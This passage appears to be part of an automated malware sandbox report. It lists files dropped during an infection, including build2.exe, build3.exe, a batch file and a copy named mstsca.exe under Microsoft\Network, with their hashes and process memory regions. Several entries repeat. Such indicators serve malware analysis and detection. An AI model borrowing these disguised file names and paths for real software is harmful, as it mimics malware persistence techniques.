                                                              SHA256

                                                              3bcb688020ab998320195b4acec37e146c2366fdaeefa86319278b3b57f4b58c

                                                              SHA512

                                                              374a37bb503a6d680f2471730f6e853c52461620f2d269dded5c85966cea53fba6402b594a82d5cc36b2c10b365e6f81dc1f0c8af3c300e450b6da8cee42912b

                                                            • C:\Users\Admin\AppData\Local\Temp\E0D3.exe
                                                              Filesize

                                                              7KB

                                                              MD5

                                                              74f18f5604cdfab09becca9a0828dc27

                                                              SHA1

                                                              1665e43d868eca4d263d560711f28c814ae8dc3f

                                                              SHA256

                                                              3bcb688020ab998320195b4acec37e146c2366fdaeefa86319278b3b57f4b58c

                                                              SHA512

                                                              374a37bb503a6d680f2471730f6e853c52461620f2d269dded5c85966cea53fba6402b594a82d5cc36b2c10b365e6f81dc1f0c8af3c300e450b6da8cee42912b

                                                            • C:\Users\Admin\AppData\Local\Temp\E0D3.exe
                                                              Filesize

                                                              7KB

                                                              MD5

                                                              74f18f5604cdfab09becca9a0828dc27

                                                              SHA1

                                                              1665e43d868eca4d263d560711f28c814ae8dc3f

                                                              SHA256

                                                              3bcb688020ab998320195b4acec37e146c2366fdaeefa86319278b3b57f4b58c

                                                              SHA512

                                                              374a37bb503a6d680f2471730f6e853c52461620f2d269dded5c85966cea53fba6402b594a82d5cc36b2c10b365e6f81dc1f0c8af3c300e450b6da8cee42912b

                                                            • C:\Users\Admin\AppData\Local\Temp\Tqqcbghwdivfantidef.bat
                                                              Filesize

                                                              4KB

                                                              MD5

                                                              248e51762a488609ddbf23e6a9f71ce4

                                                              SHA1

                                                              87a36b87bade46d0b0614b104152db7814808b21

                                                              SHA256

                                                              fc25f8a91c687d51e45cc7cddcab46a73032d8872407d8cb19041155e140a653

                                                              SHA512

                                                              76b7d51767cba0dec6c659270ff0bdbe29d2c66a7f4d6288bc884573452ba3f74ea6162d79ce4011df592bddafd0f42577af3c2acd2d5fb1b6826b9d09bfd0d0

                                                            • C:\Users\Admin\AppData\Local\bd04604c-fb1d-4907-aa5e-7387f9834b6f\CDC5.exe
                                                              Filesize

                                                              804KB

                                                              MD5

                                                              882a96452e0073218ab82ebc8844281b

                                                              SHA1

                                                              e36ad67193b1e3175290d68284eea511d5bb2a17

                                                              SHA256

                                                              398688e1e89e802326e6867bd0c3197f10de218371d70a61cff39dd9a80a8a60

                                                              SHA512

                                                              e5d798d6c2a4dd7207307fdd9133ae2fb5c758c37da7cdc35a435c2288141a847b04d3546cf1e965eeeca5849b8ac8bb3b7a58b56ece83d9ba1e3b3b9315f482

                                                            • C:\Users\Admin\AppData\Local\fa1d0046-4b36-4b8a-bdff-21222046c92e\build2.exe
                                                              Filesize

                                                              418KB

                                                              MD5

                                                              bc47d3a0d4a74adc40b3a7035344becb

                                                              SHA1

                                                              dd80bbe70106b62ea58924173a364cc936a0b1f4

                                                              SHA256

                                                              06d1366df3628a010416384f7c77c493ac35f13ee05e010751708d681ebe5169

                                                              SHA512

                                                              4a4ef35c5fcbfc5a6b86dd6235f8b1b4f048ee5b5bd74fd9173a65cd450ec0f58fcf74f5fd2e58dd5dee486c0e41c2523cd6d7528d56fc2627fbdf8b598a29e4

                                                            • C:\Users\Admin\AppData\Local\fa1d0046-4b36-4b8a-bdff-21222046c92e\build2.exe
                                                              Filesize

                                                              418KB

                                                              MD5

                                                              bc47d3a0d4a74adc40b3a7035344becb

                                                              SHA1

                                                              dd80bbe70106b62ea58924173a364cc936a0b1f4

                                                              SHA256

                                                              06d1366df3628a010416384f7c77c493ac35f13ee05e010751708d681ebe5169

                                                              SHA512

                                                              4a4ef35c5fcbfc5a6b86dd6235f8b1b4f048ee5b5bd74fd9173a65cd450ec0f58fcf74f5fd2e58dd5dee486c0e41c2523cd6d7528d56fc2627fbdf8b598a29e4

                                                            • C:\Users\Admin\AppData\Local\fa1d0046-4b36-4b8a-bdff-21222046c92e\build2.exe
                                                              Filesize

                                                              418KB

                                                              MD5

                                                              bc47d3a0d4a74adc40b3a7035344becb

                                                              SHA1

                                                              dd80bbe70106b62ea58924173a364cc936a0b1f4

                                                              SHA256

                                                              06d1366df3628a010416384f7c77c493ac35f13ee05e010751708d681ebe5169

                                                              SHA512

                                                              4a4ef35c5fcbfc5a6b86dd6235f8b1b4f048ee5b5bd74fd9173a65cd450ec0f58fcf74f5fd2e58dd5dee486c0e41c2523cd6d7528d56fc2627fbdf8b598a29e4

                                                            • C:\Users\Admin\AppData\Local\fa1d0046-4b36-4b8a-bdff-21222046c92e\build3.exe
                                                              Filesize

                                                              9KB

                                                              MD5

                                                              9ead10c08e72ae41921191f8db39bc16

                                                              SHA1

                                                              abe3bce01cd34afc88e2c838173f8c2bd0090ae1

                                                              SHA256

                                                              8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

                                                              SHA512

                                                              aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

                                                            • C:\Users\Admin\AppData\Local\fa1d0046-4b36-4b8a-bdff-21222046c92e\build3.exe
                                                              Filesize

                                                              9KB

                                                              MD5

                                                              9ead10c08e72ae41921191f8db39bc16

                                                              SHA1

                                                              abe3bce01cd34afc88e2c838173f8c2bd0090ae1

                                                              SHA256

                                                              8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

                                                              SHA512

                                                              aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              Filesize

                                                              9KB

                                                              MD5

                                                              9ead10c08e72ae41921191f8db39bc16

                                                              SHA1

                                                              abe3bce01cd34afc88e2c838173f8c2bd0090ae1

                                                              SHA256

                                                              8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

                                                              SHA512

                                                              aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              Filesize

                                                              9KB

                                                              MD5

                                                              9ead10c08e72ae41921191f8db39bc16

                                                              SHA1

                                                              abe3bce01cd34afc88e2c838173f8c2bd0090ae1

                                                              SHA256

                                                              8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

                                                              SHA512

                                                              aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

                                                            • memory/212-152-0x00000000008C0000-0x00000000008C8000-memory.dmp
                                                              Filesize

                                                              32KB

                                                            • memory/212-149-0x0000000000000000-mapping.dmp
                                                            • memory/212-162-0x0000000005CE0000-0x0000000005D02000-memory.dmp
                                                              Filesize

                                                              136KB

                                                            • memory/840-211-0x0000000000000000-mapping.dmp
                                                            • memory/840-212-0x0000000000400000-0x000000000045B000-memory.dmp
                                                              Filesize

                                                              364KB

                                                            • memory/840-214-0x0000000000400000-0x000000000045B000-memory.dmp
                                                              Filesize

                                                              364KB

                                                            • memory/840-216-0x0000000000400000-0x000000000045B000-memory.dmp
                                                              Filesize

                                                              364KB

                                                            • memory/840-218-0x0000000000400000-0x000000000045B000-memory.dmp
                                                              Filesize

                                                              364KB

                                                            • memory/840-219-0x0000000061E00000-0x0000000061EF3000-memory.dmp
                                                              Filesize

                                                              972KB

                                                            • memory/840-241-0x0000000000400000-0x000000000045B000-memory.dmp
                                                              Filesize

                                                              364KB

                                                            • memory/916-132-0x000000000076D000-0x000000000077D000-memory.dmp
                                                              Filesize

                                                              64KB

                                                            • memory/916-135-0x0000000000400000-0x0000000000581000-memory.dmp
                                                              Filesize

                                                              1.5MB

                                                            • memory/916-134-0x0000000000400000-0x0000000000581000-memory.dmp
                                                              Filesize

                                                              1.5MB

                                                            • memory/916-133-0x0000000000720000-0x0000000000729000-memory.dmp
                                                              Filesize

                                                              36KB

                                                            • memory/932-136-0x0000000000000000-mapping.dmp
                                                            • memory/936-272-0x0000000000000000-mapping.dmp
                                                            • memory/1056-169-0x0000000005230000-0x0000000005858000-memory.dmp
                                                              Filesize

                                                              6.2MB

                                                            • memory/1056-188-0x00000000076A0000-0x0000000007D1A000-memory.dmp
                                                              Filesize

                                                              6.5MB

                                                            • memory/1056-163-0x0000000000000000-mapping.dmp
                                                            • memory/1056-183-0x0000000006080000-0x000000000609E000-memory.dmp
                                                              Filesize

                                                              120KB

                                                            • memory/1056-173-0x00000000058D0000-0x0000000005936000-memory.dmp
                                                              Filesize

                                                              408KB

                                                            • memory/1056-174-0x0000000005A30000-0x0000000005A96000-memory.dmp
                                                              Filesize

                                                              408KB

                                                            • memory/1056-189-0x0000000006580000-0x000000000659A000-memory.dmp
                                                              Filesize

                                                              104KB

                                                            • memory/1056-164-0x0000000002AB0000-0x0000000002AE6000-memory.dmp
                                                              Filesize

                                                              216KB

                                                            • memory/1100-240-0x0000000000000000-mapping.dmp
                                                            • memory/1188-252-0x0000000000000000-mapping.dmp
                                                            • memory/1288-155-0x0000000000330000-0x000000000039B000-memory.dmp
                                                              Filesize

                                                              428KB

                                                            • memory/1288-160-0x0000000000330000-0x000000000039B000-memory.dmp
                                                              Filesize

                                                              428KB

                                                            • memory/1288-153-0x0000000000000000-mapping.dmp
                                                            • memory/1288-154-0x0000000000600000-0x0000000000675000-memory.dmp
                                                              Filesize

                                                              468KB

                                                            • memory/1448-177-0x0000000000000000-mapping.dmp
                                                            • memory/1552-217-0x00000000020B0000-0x00000000020F7000-memory.dmp
                                                              Filesize

                                                              284KB

                                                            • memory/1552-215-0x000000000052E000-0x0000000000557000-memory.dmp
                                                              Filesize

                                                              164KB

                                                            • memory/1552-204-0x0000000000000000-mapping.dmp
                                                            • memory/1652-238-0x0000000000400000-0x0000000000537000-memory.dmp
                                                              Filesize

                                                              1.2MB

                                                            • memory/1652-196-0x0000000000400000-0x0000000000537000-memory.dmp
                                                              Filesize

                                                              1.2MB

                                                            • memory/1652-203-0x0000000000400000-0x0000000000537000-memory.dmp
                                                              Filesize

                                                              1.2MB

                                                            • memory/1652-198-0x0000000000400000-0x0000000000537000-memory.dmp
                                                              Filesize

                                                              1.2MB

                                                            • memory/1652-193-0x0000000000000000-mapping.dmp
                                                            • memory/2036-256-0x0000000000000000-mapping.dmp
                                                            • memory/2088-247-0x0000000000000000-mapping.dmp
                                                            • memory/2104-259-0x0000000000000000-mapping.dmp
                                                            • memory/2180-255-0x0000000000000000-mapping.dmp
                                                            • memory/2180-161-0x0000000000000000-mapping.dmp
                                                            • memory/2396-273-0x0000000000000000-mapping.dmp
                                                            • memory/2592-249-0x0000000000000000-mapping.dmp
                                                            • memory/2620-184-0x0000000000000000-mapping.dmp
                                                            • memory/2720-172-0x0000000002290000-0x00000000023AB000-memory.dmp
                                                              Filesize

                                                              1.1MB

                                                            • memory/2720-140-0x0000000000000000-mapping.dmp
                                                            • memory/2720-170-0x000000000063B000-0x00000000006CD000-memory.dmp
                                                              Filesize

                                                              584KB

                                                            • memory/2760-180-0x0000000000000000-mapping.dmp
                                                            • memory/2956-276-0x0000000000000000-mapping.dmp
                                                            • memory/3064-157-0x0000000000380000-0x000000000038C000-memory.dmp
                                                              Filesize

                                                              48KB

                                                            • memory/3064-156-0x0000000000000000-mapping.dmp
                                                            • memory/3236-243-0x0000000000000000-mapping.dmp
                                                            • memory/3260-185-0x0000000000000000-mapping.dmp
                                                            • memory/3352-268-0x0000000000000000-mapping.dmp
                                                            • memory/3416-258-0x0000000000000000-mapping.dmp
                                                            • memory/3456-253-0x0000000000000000-mapping.dmp
                                                            • memory/3476-254-0x0000000000000000-mapping.dmp
                                                            • memory/3492-279-0x0000000000000000-mapping.dmp
                                                            • memory/3496-186-0x0000000000000000-mapping.dmp
                                                            • memory/3504-274-0x0000000000000000-mapping.dmp
                                                            • memory/3588-271-0x0000000000000000-mapping.dmp
                                                            • memory/3608-250-0x0000000000000000-mapping.dmp
                                                            • memory/3632-280-0x0000000000000000-mapping.dmp
                                                            • memory/3876-257-0x0000000000000000-mapping.dmp
                                                            • memory/3924-251-0x0000000000000000-mapping.dmp
                                                            • memory/3956-190-0x0000000000000000-mapping.dmp
                                                            • memory/3956-197-0x0000000002087000-0x0000000002119000-memory.dmp
                                                              Filesize

                                                              584KB

                                                            • memory/4052-207-0x0000000000000000-mapping.dmp
                                                            • memory/4104-263-0x0000000000000000-mapping.dmp
                                                            • memory/4124-242-0x0000000000000000-mapping.dmp
                                                            • memory/4140-277-0x0000000000000000-mapping.dmp
                                                            • memory/4176-264-0x0000000000000000-mapping.dmp
                                                            • memory/4236-285-0x0000000005ED0000-0x00000000064E8000-memory.dmp
                                                              Filesize

                                                              6.1MB

                                                            • memory/4236-292-0x0000000007A20000-0x0000000007F4C000-memory.dmp
                                                              Filesize

                                                              5.2MB

                                                            • memory/4236-291-0x0000000007320000-0x00000000074E2000-memory.dmp
                                                              Filesize

                                                              1.8MB

                                                            • memory/4236-287-0x0000000005970000-0x0000000005982000-memory.dmp
                                                              Filesize

                                                              72KB

                                                            • memory/4236-286-0x0000000005A40000-0x0000000005B4A000-memory.dmp
                                                              Filesize

                                                              1.0MB

                                                            • memory/4236-290-0x0000000006AA0000-0x0000000007044000-memory.dmp
                                                              Filesize

                                                              5.6MB

                                                            • memory/4236-282-0x0000000000400000-0x0000000000428000-memory.dmp
                                                              Filesize

                                                              160KB

                                                            • memory/4236-294-0x00000000072C0000-0x0000000007310000-memory.dmp
                                                              Filesize

                                                              320KB

                                                            • memory/4236-288-0x00000000059D0000-0x0000000005A0C000-memory.dmp
                                                              Filesize

                                                              240KB

                                                            • memory/4236-289-0x0000000005D10000-0x0000000005DA2000-memory.dmp
                                                              Filesize

                                                              584KB

                                                            • memory/4236-281-0x0000000000000000-mapping.dmp
                                                            • memory/4236-293-0x00000000074F0000-0x0000000007566000-memory.dmp
                                                              Filesize

                                                              472KB

                                                            • memory/4256-168-0x0000000000400000-0x0000000000537000-memory.dmp
                                                              Filesize

                                                              1.2MB

                                                            • memory/4256-192-0x0000000000400000-0x0000000000537000-memory.dmp
                                                              Filesize

                                                              1.2MB

                                                            • memory/4256-175-0x0000000000400000-0x0000000000537000-memory.dmp
                                                              Filesize

                                                              1.2MB

                                                            • memory/4256-171-0x0000000000400000-0x0000000000537000-memory.dmp
                                                              Filesize

                                                              1.2MB

                                                            • memory/4256-166-0x0000000000400000-0x0000000000537000-memory.dmp
                                                              Filesize

                                                              1.2MB

                                                            • memory/4256-165-0x0000000000000000-mapping.dmp
                                                            • memory/4344-246-0x0000000000000000-mapping.dmp
                                                            • memory/4420-275-0x0000000000000000-mapping.dmp
                                                            • memory/4520-143-0x0000000000000000-mapping.dmp
                                                            • memory/4524-269-0x0000000000000000-mapping.dmp
                                                            • memory/4560-138-0x0000000000000000-mapping.dmp
                                                            • memory/4560-176-0x0000000002620000-0x00000000026E6000-memory.dmp
                                                              Filesize

                                                              792KB

                                                            • memory/4560-159-0x0000000002D60000-0x0000000002EA9000-memory.dmp
                                                              Filesize

                                                              1.3MB

                                                            • memory/4560-178-0x0000000002EC0000-0x0000000002F70000-memory.dmp
                                                              Filesize

                                                              704KB

                                                            • memory/4560-158-0x0000000002A80000-0x0000000002C0C000-memory.dmp
                                                              Filesize

                                                              1.5MB

                                                            • memory/4560-179-0x0000000002EC0000-0x0000000002F70000-memory.dmp
                                                              Filesize

                                                              704KB

                                                            • memory/4560-182-0x0000000002D60000-0x0000000002EA9000-memory.dmp
                                                              Filesize

                                                              1.3MB

                                                            • memory/4672-270-0x0000000000000000-mapping.dmp
                                                            • memory/4716-262-0x0000000000000000-mapping.dmp
                                                            • memory/4736-146-0x0000000000000000-mapping.dmp
                                                            • memory/4856-210-0x0000000000000000-mapping.dmp
                                                            • memory/4908-278-0x0000000000000000-mapping.dmp
                                                            • memory/4936-267-0x0000000000000000-mapping.dmp
                                                            • memory/5032-261-0x0000000000000000-mapping.dmp
                                                            • memory/5068-265-0x0000000000000000-mapping.dmp
                                                            • memory/5076-260-0x0000000000000000-mapping.dmp
                                                            • memory/5112-266-0x0000000000000000-mapping.dmp